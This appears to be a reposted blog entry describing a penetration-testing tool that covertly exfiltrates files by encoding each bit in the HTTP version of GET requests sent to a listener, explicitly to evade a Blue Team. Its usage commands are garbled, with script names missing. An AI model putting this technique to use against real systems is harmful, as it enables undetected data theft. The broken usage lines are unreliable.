Http-Protocol-Exfil – Exfiltrate Files Using The HTTP Protocol Version ("HTTP/1.0" Is A 0 And "HTTP/1.1" Is A 1)

AVvXsEghPDnecGnWzWKLb7RJ4 M X h A8twQ0TeZ4Hti4WH7DDtNYD17nXuWiz1fFh 3wpxmCHiBzNEydpo g4REPqwiq VXG7ZLPDkx5jDay Dqv8f4EUd5AmU8ShFxkcfQQb rfjfVrfTynqn1H5H6jxG2hFu4FlDnRXXZymBs9mB4XePCm1K4VKu47GTlQ=w640 h478

Use the HTTP protocol version to send a file bit by bit (“HTTP/1.0” is a 0 and “HTTP/1.1” is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).

Create listener

To run the listener use with one optional argument: the port it will be listening in.

python3 [PORT]


python3 8080

Send a file

To send a file use with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).



python3 -u "" -i test.txt -o updated_test.txt


First the file is sent:

AVvXsEjBo0Fv56kaU1JeIR64jcxnQoeSj1WAF7PsjpmGvee79jH U68UY2Y mcliKsT9l8sGh2KvU hQqSSDVpmqthhTLU1xQzq7Jkkm 5a vWBpWWmKiSv1zdMJV LSyzKUkXY9DB7YpG7IkMbV5QbdlzREniI8uoQn 5AOqmshx1S2zHIEHbPuaORZwCH g=w640 h66

If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:

AVvXsEgleTmwVP30 rmwYsxbTeTU8KROzpNbn0S7LOHvDf73dG 3IHeV R39rNNIRJqORaHXOvWMHkcqzxMTd5UbqR4CYnc1wi1XI0XVoQ6 OL753czB7Ar77An4FPYJBAULv4dl1FfE4gWdsi8PtebQCi4HMPGN AxZ2aMz5MoPz0uDXN Jnt6cGIOerJIWkw=w640 h534

The new file is created with the content of the input file:

AVvXsEglCH4Cc2RfVgs3tP4e49THuA1y6WAvU8AQC0910bN25Qmk909hlC729 svOQCi0Munh4RqHsnsRTqvu 2R0UuA1YzNtWhjIzwGPFFIjmJyqNmFclZBAt6AAftHgFYI3c4JCj0wKuoPUny5GQT50T9oW K9Z8wRv7WmKCkbGxAQX51JKiOnoXTpvw YZA=w640 h60


I think (I am not sure) I read someone on Twitter who claimed to have used this to exfiltrate data and I liked the idea, if you are that person let me know.


click here to read full Article

Read More on Pentesting Tools

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *